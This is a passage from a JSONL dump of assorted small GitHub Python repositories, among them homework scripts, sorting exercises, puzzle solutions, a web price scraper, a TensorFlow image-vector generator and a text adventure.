y_test_pred = model.predict(X_test)\n print('Training MSE: ', mean_squared_error(y_train, y_train_pred))\n print('Test MSE', mean_squared_error(y_test, y_test_pred))\n\n\ndef main():\n data = pd.read_csv('hw3-nces-ed-attainment.csv', na_values='---')\n completions_between_years(data, 2007, 2008, 'F')\n compare_bachelors_1980(data)\n top_2_2000s(data)\n percent_change_bachelors_2000s(data)\n line_plot_bachelors(data)\n bar_chart_high_school(data)\n plot_hispanic_min_degrees(data)\n fit_and_predict_degrees(data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hessmad/Intermediate-Python-Data-Analysis","sub_path":"hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40268948696","text":"from kid import Kid\nfrom parent import Parent\n\n\ndef father_mother_kid():\n kid_1 = Kid('Vasya', 5, True, False)\n kid_2 = Kid('Petya', 10, True, False)\n kid_3 = Kid('Ilya', 30, True, False)\n parent = Parent('Boris', 35, [kid_1, kid_2, kid_3])\n\n print(parent.kids[0].age)\n\n\nfather_mother_kid()\n","repo_name":"MikePolynin/python_basic","sub_path":"Module24/04_fathers_mothers_kids/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22132702537","text":"\"\"\"\n입력 예시\n2\n홍길동 95\n이순신 77\n\n출력 예시\n\n이순신 홍길동\n\"\"\"\n\n# N을 입력받기\nN = int(input())\n\n# N명의 학생 정보를 입력받아 리스트에 저장\narray = []\nfor i in range(N):\n 
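# each record is a \"name score\" pair; both fields stay strings, so the\n    # sort below orders scores lexicographically rather than numerically\n    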
input_data = input().split()\n array.append([input_data[0], input_data[1]])\n\n\n# 키(key)를 이용하여, 점수를 기준으로 출력\narray = sorted(array, key=lambda student: student[1])\n\n# 정렬이 수행된 결과를 출력\nfor student in array:\n print(student[0], end = ' ')","repo_name":"hanjungwoo1/CodingTest","sub_path":"이것이 취업을 위한 코딩 테스트다/Chapter 6/6-11.py","file_name":"6-11.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"42461244964","text":"import os\nimport sys\n\nchallenge_data = None\ndata_file_name = os.path.join(os.path.dirname(sys.argv[0]), 'input.txt')\nwith open(data_file_name, 'r') as data_file:\n challenge_data = data_file.read()\ndata_file.close()\n\ninstructions = challenge_data.split('\\n')\n\ni = 0\nsteps = 0\ninstructions = [int(inst) for inst in instructions]\nwhile i < len(instructions):\n steps += 1\n jump_value = instructions[i]\n if jump_value >= 3:\n incremented_instruction = jump_value - 1\n else:\n incremented_instruction = jump_value + 1\n instructions[i] = incremented_instruction\n i = i + jump_value\n\nprint(steps)\n","repo_name":"Sam-Hart/AdventOfCode2017","sub_path":"Day4-AMazeOfTwistyTrampolinesAllAlike/AMazeOfTwistyTrampolinesAllAlikeB.py","file_name":"AMazeOfTwistyTrampolinesAllAlikeB.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33137723792","text":"\n\ndef merge(A, B):\n\n comparisons = 0\n exchanges = 0\n\n mergedArray = []\n\n while len(A) != 0 and len(B) != 0:\n if A[0] < B[0]:\n mergedArray.append(A[0])\n exchanges+=1\n comparisons+=1\n A.remove(A[0])\n else:\n mergedArray.append(B[0])\n exchanges+=1\n B.remove(B[0])\n\n if len(A) == 0:\n mergedArray += B\n exchanges+=len(B)\n else:\n mergedArray += A\n exchanges+=len(A)\n\n return mergedArray, comparisons, exchanges\n\n\ndef merge_sort(A):\n comparisons = 0\n exchanges = 0\n if len(A) == 0 or len(A) == 1:\n return A, comparisons, exchanges\n else:\n mid = int(len(A) / 2)\n c1 = 0\n c2 = 0\n e1 = 0\n e2 = 0\n firstHalf, c1, e1 = merge_sort(A[:mid])\n secondHalf, c2, e2 = merge_sort(A[mid:])\n\n c3 =0\n e3 =0\n\n A, c3, e3 = merge(firstHalf, secondHalf)\n return A, c3, e3\n","repo_name":"shaoormunir/sorting-algorithm-analysis","sub_path":"MergeSortRecursive.py","file_name":"MergeSortRecursive.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37465541136","text":"import numpy as np\nimport os\nimport math\nimport underworld3 as uw\nfrom petsc4py import PETSc\n\n\n\n\nboxLength = 1.0\nboxHeight = 1.0\nn_els = 32\ndim = 2\nppcell = 10\namplitude = 0.02\noffset = 0.2\n\n\nmesh = uw.mesh.Mesh(elementRes=( n_els,)*dim,\n minCoords =( 0.,)*dim,\n maxCoords =(boxLength,1.),\n simplex=False )\nu_degree = 1\n\n\n# Create swarm\nswarm = uw.swarm.Swarm(mesh)\n# Add variable for material\nmatSwarmVar = swarm.add_variable(name=\"matSwarmVar\", num_components=1, dtype=PETSc.IntType)\n# Note that `ppcell` specifies particles per cell per dim.\nswarm.populate(ppcell=ppcell)\n\n\n#%%\n# define these for convenience.\ndenseIndex = 0\nlightIndex = 1\n\n# material perturbation from van Keken et al. 1997\nwavelength = 2.0*boxLength\nk = 2. 
* np.pi / wavelength\n\n# init material variable\nwith swarm.access(matSwarmVar):\n perturbation = offset + amplitude*np.cos( k*swarm.particle_coordinates.data[:,0] )\n matSwarmVar.data[:,0] = np.where( perturbation>swarm.particle_coordinates.data[:,1], lightIndex, denseIndex )\n\n\n\n\nfrom sympy import Piecewise, ceiling, Abs\n\ndensity = Piecewise( ( 0., Abs(matSwarmVar.fn - lightIndex)<0.5 ),\n ( 1., Abs(matSwarmVar.fn - denseIndex)<0.5 ),\n ( 0., True ) )\n\n\n\n#this should produce an error\ncheck_eval = uw.function.evaluate(density, mesh.data)\n","repo_name":"dansand/issues","sub_path":"uw3_issues/swarm_mesh_eval_test.py","file_name":"swarm_mesh_eval_test.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30510091529","text":"x = (int)(input())\nfound = 0\nif(x < 4):\n print(1)\nelse:\n for i in range(x,1,-1):\n if(found == 1):\n break\n for coeficiente in range(2,9,1):\n raiz = (i) ** (1 / coeficiente)\n #print(f'raiz {coeficiente} de {i} ={raiz}')\n if(raiz%1 == 0):\n print(i)\n found += 1\n break\n \n","repo_name":"Danilo-Carvalho-Antunes/TEP-1","sub_path":"Lista-4/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26621513604","text":"from adventure import Adventure\nfrom termcolor import colored\nfrom sys import argv\nfrom os.path import dirname, basename\n\nif len(argv) == 1:\n path = \"testing\"\n fileName = \"testAdventure.yaml\"\nelif len(argv) == 2:\n path = dirname(argv[1])\n fileName = basename(argv[1])\nelse:\n print(\"Takes 0 or 1 args:\")\n print(\"1. path to adventure file\")\n exit()\n\nad = Adventure(path,fileName)\nprint(\"*******************************************************\")\nprint(\"* \" + ad.name)\nprint(\"*******************************************************\")\nprint(ad.getQuest())\nprint(\"*******************************************************\")\n\nwhile ad.running:\n print(ad.getLocalDescription())\n action = input(colored(ad.player.name + \" >> \",'red')).split()\n\n if len(action) == 0:\n verb = ' '\n else:\n verb = action[0]\n\n noun = None\n thing = None\n\n if len(action) > 1:\n try:\n noun = int(action[1])\n except:\n noun = None\n if noun in ad.currentNouns:\n thing = ad.currentNouns[noun]\n else:\n print(\"Um, no.\")\n continue\n\n if verb == 'q':\n ad.quit()\n elif verb == 'g':\n if not thing.goesTo == None:\n ad.goToLocation(thing.goesTo)\n elif verb == 'l':\n if thing:\n print(thing.description)\n elif verb == 'a':\n if thing:\n output = ad.listInteractions(thing)\n print(output)\n if \"No\" not in output:\n choice = input(colored(\"Choose an interaction >> \", 'red'))\n print(ad.executeInteraction(thing, choice))\n elif verb == 'f':\n if thing:\n if thing.fight:\n fighting = True\n while fighting:\n print(ad.attack(ad.player,thing))\n print(ad.attack(thing,ad.player))\n print(ad.player.name + \" has \" + str(ad.player.hp) + \"hp left.\")\n if not ad.player.alive:\n print(\"You are dead. Welcome to the afterlife.\")\n ad.quit()\n fighting = False\n elif not thing.alive:\n print(\"You have vanquished your foe. 
Congrats!\")\n fighting = False\n else:\n choice = input(colored(\"Continue fighting(y/n) >> \",'red'))\n print(\" \")\n if choice == 'n':\n print(\"Phew.\")\n fighting = False\n elif verb == 't':\n if thing:\n print(ad.take(thing.id))\n elif verb == 'p':\n output = ad.listInventory(ad.player)\n print(output)\n if \"No\" not in output:\n choice = input(colored(\"Enter ID of thing to put >> \", 'red'))\n try:\n invThingID = int(choice)\n except:\n invThingID = None\n print(ad.putFromInventory(ad.player,invThingID))\n elif verb == 'i':\n print(ad.listInventory(ad.player))\n elif verb == 's':\n if thing:\n print(ad.listStatus(thing))\n else:\n print(ad.listStatus(ad.player))\n elif verb == 'talk':\n if thing:\n prompts = thing.getPrompts()\n if len(prompts) > 0:\n promptIndex = 0\n for promptString in prompts:\n print(str(promptIndex) + \". \" + promptString)\n promptIndex += 1\n selection = input(colored(\"choice >> \", 'red'))\n try:\n selection = int(selection)\n except:\n selection = 1024\n if selection < promptIndex:\n print(ad.talk(thing,selection))\n else:\n print(\"That's odd.\")\n else:\n print(\"I'm not sure \" + thing.name + \" is interested in talking.\")\n\n\n","repo_name":"kevinputnam/adventure_framework","sub_path":"adventure_test_wrapper.py","file_name":"adventure_test_wrapper.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26438028555","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef Parser(url, name_of_game):\r\n HEADERS = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36',\r\n 'accept': '*/*'\r\n }\r\n response = requests.get(url, headers=HEADERS)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n\r\n cols = []\r\n results = []\r\n result_string = ''\r\n\r\n\r\n table = soup.find('table').find('tbody')\r\n rows = table.findAll('tr')\r\n for row in rows:\r\n cols.append(row.findAll('td'))\r\n\r\n for col in range(len(cols)):\r\n try:\r\n results.append({\r\n 'name_shop': cols[col][0].get_text(strip=True).upper(),\r\n 'price': cols[col][1].get_text(strip=True),\r\n 'link': cols[col][2].find('noindex').find('a').get('href')\r\n })\r\n except IndexError:\r\n pass\r\n for result in results:\r\n result_string += f\"🎮 В магазине {result['name_shop']} игру {name_of_game} можно купить за {result['price']}. 
\\n\\n👾Ссылка на магазин: {result['link']}\\n\\n\"\r\n return result_string\r\n\r\n","repo_name":"Pol1na/FindGames_ChatBotTG","sub_path":"GamesFinderBot/Soup_IWP.py","file_name":"Soup_IWP.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12898927838","text":"from main import *\ndef preprocess():\n map_file = '../data/ID_map.tab'\n with open(map_file, 'r+') as f:\n lines = f.readlines()\n for i in range(len(lines)):\n line = lines[i]\n line = line.split('\\t')[:-1]\n line[-1] += '\\n'\n line = '\\t'.join(line)\n lines[i] = line\n with open(map_file, 'w') as f:\n f.writelines(lines)\n\ndef get_diff(proteins, threshold = 0):\n l = get_annotated_ids()\n index_mapping = dict(zip(l, range(len(l))))\n d = gene_mapping('id')\n for cancer_name in ['hepatitis', 'breast', 'leukemia']:\n for i in range(1, 21):\n i /= 10\n path = '../tem_data/{}_records/diff_{}.npy'.format(cancer_name, i)\n a = np.load(path)\n for protein in proteins:\n index = index_mapping[protein]\n diffs = a[index]\n if (np.abs(diffs)>threshold).any():\n print('in file:', path)\n print(*d[protein], *np.round(diffs, 3))\n \n\n\n\nif __name__ == '__main__':\n import sys\n query_file = sys.argv[1]\n with open(query_file) as f:\n proteins = f.read().replace(',', ' ').split()\n\n d = gene_mapping('gene')\n found = []\n not_founds = []\n for i in proteins:\n if i in d:\n found.extend(d[i])\n else:\n not_founds.append(i)\n #print('Following proteins not in dict:',*not_founds)\n print('Following proteins found:')\n get_diff(found, 0.5)\n","repo_name":"brown-2/mis_localization","sub_path":"code/query_alternative.py","file_name":"query_alternative.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11296193474","text":"from typing import List, Dict\n\nfrom m0rkcoin_tip_bot import rpc_client\nfrom m0rkcoin_tip_bot.config import config\n\n\ndef register() -> str:\n result = rpc_client.call_method('createAddress')\n return result['address']\n\n\ndef send_transaction(from_address: str, to_address: str, amount: int) -> str:\n payload = {\n 'addresses': [from_address],\n 'transfers': [{\n \"amount\": amount,\n \"address\": to_address\n }],\n 'fee': config.tx_fee,\n 'anonymity': 0\n }\n result = rpc_client.call_method('sendTransaction', payload=payload)\n return result['transactionHash']\n\n\ndef get_wallet_balance(address: str) -> Dict[str, int]:\n result = rpc_client.call_method('getBalance', {'address': address})\n return result\n\n\ndef get_all_balances(wallet_addresses: List[str]) -> Dict[str, Dict]:\n wallets = {}\n for address in wallet_addresses:\n wallet = rpc_client.call_method('getBalance', {'address': address})\n wallets[address] = wallet\n return wallets\n","repo_name":"MarcDufresne/m0rkcoin-tip-bot","sub_path":"m0rkcoin_tip_bot/wallet.py","file_name":"wallet.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"17811828017","text":"\"\"\"\nCAP4630: Project1 - Python Basics\n\nDescription: This project was designed to parse a csv file containing records of each state including \na 2022 report for each state's population size, median household income, and covid cases & casualties. 
\nThese records are then placed into a state list with various fields\n\nThe program will search for a csv file to which it will then prompt the user to choose amongst serval actions.\nIf any input does not meet the program's requirements, an error message will appear. The actions include: \nprinting a state report, sort the states by name, sort the states by full vaccination rates, find and print \na particular state's records, display a Spearman's Rho correlation, for {Case Rate, Death Rate} \nx {Median Household Income, Violent Crime Rates, Full Vaccination Rates}. If any of these actions are no longer \nrequested, the user will have the option to quit from the program.\n\nAuthor: Eyob Tekle\nVersion: February 4, 2022\nEmail: N01239628@unf.edu\n\"\"\"\nimport csv\nfrom State import *\n\n\"\"\"\nDescription: prints out each states' name, median household income, violent crime rate, covid fatality rate, \n case rate, death rate, and full vaccination rate\n:param state name\n:return N/A\n\"\"\"\ndef stateReport(states):\n space = \" \"\n print(\"\\nName %15s MHI %8s VCR %8s CFR %10s Case Rate %5s Death Rate %2s FVR\\n\" \n \"------------------------------------------------\"\n \"---------------------------------------------------\" \n %(space, space, space, space, space, space))\n for x in states:\n poprate = psample / int(x.get_pop())\n print(\"%-20s %s %12.1f %15.6f %14.2f %13.2f %13.4f\"\n\t\t\t %(x.get_name(), x.get_income(), float(x.get_violent()),\n int(x.get_deaths())/int(x.get_cases()), int(x.get_cases()) * poprate, \n int(x.get_deaths()) * poprate, float(x.get_vaccine())/100))\n #End For Loop\n\n\"\"\"\nDescription: Sorts state list based on state fatality rate using mergesort\n:param state object\n:return N/A\n\"\"\"\ndef fatalitySorter(states):\n\n if(len(states) <= 1):\n return\n else:\n mid = len(states) >> 1\n left = states[:mid]\n right = states[mid:] \n\n fatalitySorter(left)\n fatalitySorter(right) \n\n l_dex = r_dex = s_dex = 0\n\n while(l_dex < len(left) and r_dex < len(right)):\n if(int(left[l_dex].get_deaths())/int(left[l_dex].get_cases()) < int(right[r_dex].get_deaths())/int(right[r_dex].get_cases())):\n states[s_dex] = left[l_dex]\n l_dex += 1\n else:\n states[s_dex] = right[r_dex]\n r_dex += 1\n s_dex += 1\n #Enf While Loop\n while(l_dex) < len(left):\n states[s_dex] = left[l_dex]\n l_dex += 1\n s_dex += 1\n #End While Loop\n while(r_dex < len(right)):\n states[s_dex] = right[r_dex]\n r_dex += 1\n s_dex += 1\n #End While Loop\n\n\"\"\"\nDescription: partitions a list during quicksort\n:param state list\n:param lower bound limit\n:param upper bound limit\n:return new upper binding limit\n\"\"\"\ndef partition(states, low_bound, up_bound):\n left_part = low_bound\n right_part = up_bound - 1\n pivot = states[up_bound].get_name()\n \n while True:\n while(states[left_part].get_name() < pivot):\n left_part += 1\n \n while(right_part + 1 > 0 and states[right_part].get_name() > pivot):\n right_part -= 1\n\n if(left_part >= right_part):\n break\n else:\n (states[left_part],states[right_part]) = (states[right_part],states[left_part])\n \n (states[left_part],states[up_bound]) = (states[up_bound],states[left_part])\n return left_part\n\n\"\"\"\nDescription: sorts state list based on state name using quicksort\n:param state object\n:param list lower bound\n:param list upper bound\n:return N/A\n\"\"\"\ndef nameSorter(states, low_bound, up_bound):\n if(up_bound - low_bound <= 0 or len(states) == 1):\n return\n else:\n part = partition(states, low_bound, up_bound)\n\n 
nameSorter(states, low_bound, part - 1)\n nameSorter(states, part + 1, up_bound)\n\n\"\"\"\nDescription: finds a state based on user input and prints records\n:param user input in the form of a state name\n:param boolean variable, checks which sort method was used\n:param state list\n:return N/A\n\"\"\"\ndef state_finder(key, nSort, states):\n num2 = 0\n if(nSort == True):\n low_bound = 0\n up_bound = len(states) - 1\n\n print(\"Using Binary Search...\\n\")\n\n while(low_bound <= up_bound):\n \n mid = (low_bound + up_bound) >> 1\n if(states[mid].get_name() == key):\n num2 = mid\n break\n elif(states[mid].get_name() > key):\n up_bound = mid - 1\n else:\n low_bound = mid + 1\n else:\n j = 0\n\n print(\"Using Sequential Search...\\n\")\n\n while(j < len(states)):\n if(states[j].get_name() == key):\n break\n j += 1\n \n num2 = 0 if j == 50 else j\n\n if(states[num2].get_name() != key):\n print(\"Sorry, but '\" + key +\"' was not found.\\n\")\n else:\n poprate = psample/int(states[num2].get_pop())\n space = \" \"\n print(\"State Search Succedsul\\n\"\n \"Name: %10s%s\\n\"\n \"MHI: %11s%s\\n\"\n \"VCR: %11s%.1f\\n\"\n \"CFR: %11s%.6f\\n\"\n \"Case Rate: %5s%.2f\\n\"\n \"Death Rate: %4s%.2f\\n\"\n \"FV Rate: %7s%.3f\\n\"\n %(space, states[num2].get_name(), space, states[num2].get_income(), space, float(states[num2].get_violent()), space, \n int(states[num2].get_deaths())/int(states[num2].get_cases()), space, int(states[num2].get_cases()) * poprate, space,\n int(states[num2].get_deaths()) * poprate, space, float(states[num2].get_vaccine())/100))\n \n\"\"\"\nDescription: this method displays the Spearman's Rho correlation between the states'\n covid case rate & median household income,\n covid case rate & violent crime rate,\n covid case rate & full vaccination rate,\n covid death rate & median household income,\n covid death rate & violent crime rate, and\n covid death rate & full vaccination rate.\n:param state list\n:return N/A\n\"\"\"\ndef spearman_rho(states):\n \n rho1 = rho2 = rho3 = rho4 = rho5 = rho6 = 0.0000\n tempMHI = []\n medHI = []\n tempVCR = []\n caseRank = []\n deathRank = []\n vRate = []\n tempFVR = []\n fullVR = []\n cRate = []\n dRate = []\n\n for x in states:\n tempMHI.append(int(x.get_income()))\n medHI.append(int(x.get_income()))\n tempVCR.append(float(x.get_violent()))\n vRate.append(float(x.get_violent()))\n tempFVR.append(float(x.get_vaccine()))\n fullVR.append(float(x.get_vaccine()))\n cRate.append(int(x.get_cases()) * psample / int(x.get_pop()))\n dRate.append(int(x.get_deaths()) * psample / int(x.get_pop()))\n caseRank.append(int(x.get_cases()) * psample / int(x.get_pop()))\n deathRank.append(int(x.get_deaths()) * psample / int(x.get_pop()))\n\n for x in range(1, len(states)):\n tempInc = medHI[x]\n tempCsRt = cRate[x]\n tempDthRt = dRate[x]\n tempCrime = vRate[x]\n tempFull = fullVR[x]\n\n in1 = in2 = in3 = in4 = in5 = x - 1\n\n while(in1 >= 0 and cRate[in1] > tempCsRt):\n cRate[in1 + 1] = cRate[in1]\n in1 -= 1\n while(in2 >= 0 and dRate[in2] > tempDthRt):\n dRate[in2 + 1] = dRate[in2]\n in2 -= 1\n while(in3 >= 0 and medHI[in3] > tempInc):\n medHI[in3 + 1] = medHI[in3]\n in3 -= 1\n while(in4 >= 0 and vRate[in4] > tempCrime):\n vRate[in4 + 1] = vRate[in4]\n in4 -= 1\n while(in5 >= 0 and fullVR[in5] > tempFull):\n fullVR[in5 + 1] = fullVR[in5]\n in5 -= 1\n\n cRate[in1 + 1] = tempCsRt\n dRate[in2 + 1] = tempDthRt\n medHI[in3 + 1] = tempInc\n vRate[in4 + 1] = tempCrime\n fullVR[in5 + 1] = tempFull\n #End For Loop \n ranking(caseRank,cRate)\n ranking(deathRank,dRate)\n 
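# ranking() rewrites each list in place as 1-based rank positions,\n    # found by binary-searching the matching sorted copy\n    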
ranking(tempMHI,medHI)\n ranking(tempVCR,vRate)\n ranking(tempFVR,fullVR)\n\n for x in range(0, len(states)):\n rho1 += (caseRank[x] - tempMHI[x]) ** 2\n rho2 += (caseRank[x] - tempVCR[x]) ** 2\n rho3 += (caseRank[x] - tempFVR[x]) ** 2\n rho4 += (deathRank[x] - tempMHI[x]) ** 2\n rho5 += (deathRank[x] - tempVCR[x]) ** 2\n rho6 += (deathRank[x] - tempFVR[x]) ** 2\n\n p = len(states) * ((len(states) ** 2) - 1)\n\n rho1 = 1 - (6 * rho1 / p)\n rho2 = 1 - (6 * rho2 / p)\n rho3 = 1 - (6 * rho3 / p)\n rho4 = 1 - (6 * rho4 / p)\n rho5 = 1 - (6 * rho5 / p)\n rho6 = 1 - (6 * rho6 / p)\n\n print(\"\\n------------------------------------------------------------------\\n\"\n\t\t \"|\\t\\t|\\tMHI\\t |\\tVCR\\t | \\tFVR\\t | \\n\"\n\t\t \"------------------------------------------------------------------\\n\"\n\t\t \"| Case Rate | %.4f\\t | %.4f\\t | %.4f\\t |\\n\"\n\t\t \"------------------------------------------------------------------\\n\"\n\t\t \"| Death Rate | %.4f\\t | %.4f\\t | %.4f\\t |\\n\"\n\t\t \"------------------------------------------------------------------\\n\" %(rho1, rho2, rho3, rho4, rho5, rho6))\n \n\"\"\"\nDescription: This method searches a list contain a certain state field and rates it's rank\n:param unsorted state list object\n:param sorted state list object\n:return N/A\n\"\"\"\ndef ranking(rate, sortedRate):\n for x in range (0, len(rate)):\n low_bound = 0\n up_bound = len(rate) - 1\n\n while(low_bound <= up_bound):\n mid = (low_bound + up_bound) >> 1\n if(sortedRate[mid] == rate[x]):\n rate[x] = mid + 1\n break\n elif(sortedRate[mid] > rate[x]):\n up_bound = mid - 1\n else:\n low_bound = mid + 1\n #End If/Else\n #End While\n #End For\n#End Method\n\n\nnum = 0\nnameSorted = False\nstates = []\npsample = 100000\n\ntry:\n f = open('States.csv', 'r') \n next(f) #End Try\nexcept IOError:\n print('cannot open file') #End Except\n\nlines = csv.reader(f)\n\nfor s in lines:\n state = State(*s)\n states.append(state)\n\nwhile True:\n try:\n print(\"\\n Would you like to :\\n\"\n + \"1. Print A State Report\\n\"\n + \"2. Sort By State Name\\n\"\n + \"3. Sort By Case Fatailty Rate\\n\"\n + \"4. Find And Print A State For A Given Name\\n\"\n + \"5. Print Spearman's \\u03C1 Correlation Matrix\\n\"\n + \"6. 
QUIT\")\n\n num = int(input())\n #End Try\n except ValueError:\n while True:\n try:\n print(\"%s Is Not A Valid Input: Please Enter 1 - 6!\" %num)\n num = int(input())\n break\n except ValueError:\n print(\"%s Is Not A Valid Input: Please Enter 1 - 6!\" %num)\n #End Except\n if num == 1:\n stateReport(states)\n elif num == 2:\n nameSorter(states, 0, len(states) - 1)\n print(\"States Have Been Sorted By Name.\\n\")\n nameSorted = True\n elif num == 3:\n fatalitySorter(states)\n print(\"States Have Been Sorted By Fatality Rate\\n\")\n nameSorted = False\n elif num == 4:\n print(\"Which State Are You Searching: \")\n state_finder(input(), nameSorted, states)\n elif num == 5:\n spearman_rho(states)\n elif num == 6:\n print(\"Goodbye!\\n\")\n break\n else:\n print(\"%s Is Not A Valid Input: Please Enter 1 - 6!\" % num)\n\nf.close()","repo_name":"etekle/State_Records","sub_path":"Project1.py","file_name":"Project1.py","file_ext":"py","file_size_in_byte":11791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38674112326","text":"TotalSum = 0 \nValue = [] #values to be added\n\n#Range we got and then comparing the values according to criteria\nfor i in range(10, 354294): \n Sum = 0 #This sum is for getting one single value \n for x in Str(i):\n Sum += int(x) ** 5 #checking for main condition with power 5 \n if Sum == i: #If the sum matches with the value \n Value.append(i) #The value we are in search for \n\n# We add those values stored in the list to get totalsum\nfor i in Value:\n TotalSum += i\n\nprint (\"Values :\" , Value)\nprint (\"TotalSum :\" , TotalSum)\n","repo_name":"samridhiagarwal/euler30-with-python","sub_path":"euler30.py","file_name":"euler30.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29831199999","text":"# coding: utf-8\nimport sys, os\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.platform import gfile\n\nclass VectorGen:\n def __init__(self, conf, logger):\n self._conf = conf\n self._logger = logger\n self._load_inception_model(conf)\n\n def gen_vector(self, listImage):\n listVectors = []\n\n with tf.Session() as sess:\n init = tf.global_variables_initializer()\n sess.run(init)\n\n for img_path in listImage:\n self._logger.debug(\"To generate vector for image: {}\".format(img_path))\n image_data = gfile.FastGFile(img_path, 'rb').read()\n bottleneck_values = self._run_bottleneck_on_image(sess, image_data, self.jpeg_data_tensor, self.bottleneck_tensor)\n listVectors.append(bottleneck_values)\n\n return listVectors\n\n def _load_inception_model(self, conf): # 读取模型\n self._logger.info(\"Load inception v3 model: {} {}\".format(conf['inception_v3']['model_dir'], conf['inception_v3']['model_file']))\n with gfile.FastGFile(os.path.join(conf['inception_v3']['model_dir'], conf['inception_v3']['model_file']), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n # 加载模型,返回对应名称的张量\n self.bottleneck_tensor, self.jpeg_data_tensor = tf.import_graph_def(graph_def,\n return_elements=[conf['inception_v3']['bottleneck_data_name'],\n conf['inception_v3']['image_data_name']])\n\n def _run_bottleneck_on_image(self, sess, image_data, image_data_tensor, bottleneck_tensor):\n bottleneck_values = sess.run(bottleneck_tensor, {image_data_tensor: image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n return 
bottleneck_values\n\n\n","repo_name":"danny1984/image_search_app","sub_path":"query_process/src/vector_gen/tf_vector_gen.py","file_name":"tf_vector_gen.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"23956939485","text":"def showPos(s):\n apos=[]\n bpos=[]\n for i in range(0,len(s)):\n if(s[i]==\"A\"):\n apos.append(i)\n elif(s[i]=='B'):\n bpos.append(i)\n return apos,bpos\ndef acheck(i,bpos,s):\n if(i-1== -1 or s[i-1] !='-'):\n return False\n else:\n for j in bpos:\n if (j+1 == i-1):\n return False\n return True\ndef bcheck(i,apos,s):\n if(i+1== len(s) or s[i+1] !='-'):\n return False\n else:\n for j in apos:\n if (j-1 == i+1):\n return False\n return True\n\nn=int(input())\ns=input().split()\napos,bpos=showPos(s)\nprint(apos,bpos)\nwhile(len(apos)!=0 and len(bpos) !=0):\n for i in range(0,len(apos)):\n if(acheck(apos[i],bpos,s)):\n apos[i]-=1\n s[apos[i]]=\"A\"\n print(\"test\")\n else:\n apos.remove(apos[i])\n print(s,apos) \n for i in range(0,len(bpos)):\n if(bcheck(bpos[i],apos,s)):\n print(\"test\")\n bpos[i]+=1\n s[bpos[i]]=\"B\" \n else:\n bpos.remove(bpos[i])\nprint(s)","repo_name":"Moinkhan8439/Python-Program","sub_path":"tcs/election.py","file_name":"election.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3204248385","text":"#cislo = int('abc')\nprint('ahoj')\nif 1 < 2:\n #print(1/'1')\n print(3)\n\nwhile True:\n vstup = input('Zadej cislo: ')\n try:\n cislo = int(vstup)\n vysledek = 100 / cislo\n except (ValueError, ZeroDivisionError):\n print('Zadala jsi blbost.')\n else:\n print('vysledek je: ', vysledek)\n break\n\nnasobek = cislo * 27\nprint(nasobek)\n","repo_name":"MainHackerman/lekce11","sub_path":"chyby.py","file_name":"chyby.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37309784676","text":"from django.core.management.base import BaseCommand\n\nfrom home.models import SVGToPNGMap\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n for map in SVGToPNGMap.objects.all():\n map.png_image_file.delete()\n map.delete()\n\n self.stdout.write(self.style.SUCCESS('SVG to PNG map cleared.'))\n","repo_name":"unicef/iogt","sub_path":"home/management/commands/clear_svg_to_png_map.py","file_name":"clear_svg_to_png_map.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"} +{"seq_id":"10499635989","text":"from cards import deck, name, hand_score\n\n# Players get dealt a number of cards, the cards are determined by the user\n# Whoever has the highest hand wins\n\n# Game gets a deck of cards\n# Players get dealt some cards\n\ncards = deck()\n\nplayer1 = []\nplayer2 = []\n\nfor i in range(1, 6):\n player1 += [cards.pop()]\n player2 += [cards.pop()]\n\nplayer1score = hand_score(player1)\nplayer2score = hand_score(player2)\n\n\nprint(f\"Player 1's hand is {list(map(name, player1))} and their score is {player1score} 